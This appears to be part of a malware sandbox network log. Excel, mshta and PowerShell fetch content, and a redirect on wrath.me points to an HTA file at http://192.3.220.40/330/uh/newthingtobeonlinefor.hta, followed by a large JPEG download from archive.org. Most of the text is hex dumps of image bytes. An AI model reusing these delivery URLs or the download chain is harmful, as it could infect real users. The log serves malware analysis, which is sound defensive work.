                                                                                                                                                                                                                    2024-10-08 13:23:55 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                                                                    2024-10-08 13:23:55 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                                                                                                                                                                                    Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                                                                                                                                                                                    2024-10-08 13:23:55 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                                                                                                                                                                                    Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                                                                                                                                                                                    2024-10-08 13:23:55 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                                                                                                                                                                                    Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                                                                                                                                                                                    2024-10-08 13:23:55 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                                                                                                                                                                                    Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                                                                                                                                                                                    2024-10-08 13:23:55 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                                                                                                                                                                                    Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                                                                                                                                                                                    2024-10-08 13:23:55 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                                                                                                                                                                                    Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                                                                                                                                                                                    2024-10-08 13:23:55 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                                                                                                                                                                                    Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                                                                                                                                                                                    2024-10-08 13:23:55 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                                                                                                                                                                                    Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                                                                                                                                                                                    2024-10-08 13:23:55 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                                                                                                                                                                                    Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    3192.168.2.2249167188.114.96.34433480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-08 13:23:58 UTC321OUTGET /EhYykL HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Host: wrath.me
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2024-10-08 13:23:58 UTC1166INHTTP/1.1 302 Found
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:58 GMT
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 74
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                    cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                    cross-origin-resource-policy: same-origin
                                                                                                                                                                                                                    x-dns-prefetch-control: off
                                                                                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                    strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                    x-download-options: noopen
                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                    origin-agent-cluster: ?1
                                                                                                                                                                                                                    x-permitted-cross-domain-policies: none
                                                                                                                                                                                                                    referrer-policy: no-referrer
                                                                                                                                                                                                                    x-xss-protection: 0
                                                                                                                                                                                                                    location: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta
                                                                                                                                                                                                                    vary: Accept, Accept-Encoding
                                                                                                                                                                                                                    x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    x-do-orig-status: 302
                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FJLE8EshdtH1h6icEE8ofbfq0%2FOwo376ZXKJV7A0ki%2Bp4SsJDWZgDCNup%2FN32TLA36yiuyDj1YQEhl4T5NWUqeYE3NHHVv%2FDaCac1%2FwfOHSUw%2Bn93v6Xb94Nqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 8cf672d28c264238-EWR
                                                                                                                                                                                                                    2024-10-08 13:23:58 UTC74INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 33 33 30 2f 75 68 2f 6e 65 77 74 68 69 6e 67 74 6f 62 65 6f 6e 6c 69 6e 65 66 6f 72 2e 68 74 61
                                                                                                                                                                                                                    Data Ascii: Found. Redirecting to http://192.3.220.40/330/uh/newthingtobeonlinefor.hta


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    4192.168.2.2249169188.114.97.34432988C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-08 13:24:00 UTC345OUTGET /EhYykL HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Language: fr-FR
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Host: wrath.me
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2024-10-08 13:24:00 UTC1164INHTTP/1.1 302 Found
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:24:00 GMT
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 74
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                    cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                    cross-origin-resource-policy: same-origin
                                                                                                                                                                                                                    x-dns-prefetch-control: off
                                                                                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                    strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                    x-download-options: noopen
                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                    origin-agent-cluster: ?1
                                                                                                                                                                                                                    x-permitted-cross-domain-policies: none
                                                                                                                                                                                                                    referrer-policy: no-referrer
                                                                                                                                                                                                                    x-xss-protection: 0
                                                                                                                                                                                                                    location: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta
                                                                                                                                                                                                                    vary: Accept, Accept-Encoding
                                                                                                                                                                                                                    x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    x-do-orig-status: 302
                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2xk0jt4gVcB2uEtNlTL6oT3CKNin9DeGa%2F87%2Bpn7EWKZxDrBENe9DRExLHhl7VTRVgbisKiKKgzGN71%2FVv7OM%2FlOE4TUTavkEOPbuvmtqB%2BnxJ30td3hcYwhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 8cf672df6b3d0cc4-EWR
                                                                                                                                                                                                                    2024-10-08 13:24:00 UTC74INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 33 33 30 2f 75 68 2f 6e 65 77 74 68 69 6e 67 74 6f 62 65 6f 6e 6c 69 6e 65 66 6f 72 2e 68 74 61
                                                                                                                                                                                                                    Data Ascii: Found. Redirecting to http://192.3.220.40/330/uh/newthingtobeonlinefor.hta


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    5192.168.2.2249176207.241.227.2424433784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-08 13:24:15 UTC117OUTGET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1
                                                                                                                                                                                                                    Host: ia600102.us.archive.org
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2024-10-08 13:24:16 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:24:15 GMT
                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                    Content-Length: 6331693
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 03:49:30 GMT
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    ETag: "6704abca-609d2d"
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=15724800
                                                                                                                                                                                                                    Expires: Tue, 08 Oct 2024 19:24:15 GMT
                                                                                                                                                                                                                    Cache-Control: max-age=21600
                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                    Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    2024-10-08 13:24:16 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                                                                    2024-10-08 13:24:16 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                                                                                                                                                                                    Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                                                                                                                                                                                    2024-10-08 13:24:16 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                                                                                                                                                                                    Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                                                                                                                                                                                    2024-10-08 13:24:16 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
